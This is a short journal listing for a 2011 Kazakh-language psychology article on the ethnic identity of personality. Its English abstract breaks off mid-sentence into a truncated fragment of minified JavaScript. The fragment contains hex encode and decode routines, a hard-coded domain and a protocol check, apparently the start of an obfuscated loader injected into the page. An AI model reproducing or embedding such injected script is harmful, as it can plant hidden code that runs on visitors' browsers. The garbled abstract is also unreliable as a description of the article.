ЭТНОПСИХОЛОГИЯДАҒЫ ТҰЛҒАНЫҢ ЭТНОСТЫҚ БІРДЕЙЛІГІНІҢ ЕРЕКШЕЛІКТЕРІН ПСИХОЛОГИЯЛЫҚ ТАЛДАУ (The Journal of Psychology and Sociology, 2011)
The psychological features of the definition and development of ethnic identity of personality in ethnicalpsychology are discussed// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bulletin-psysoc.kaznu.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e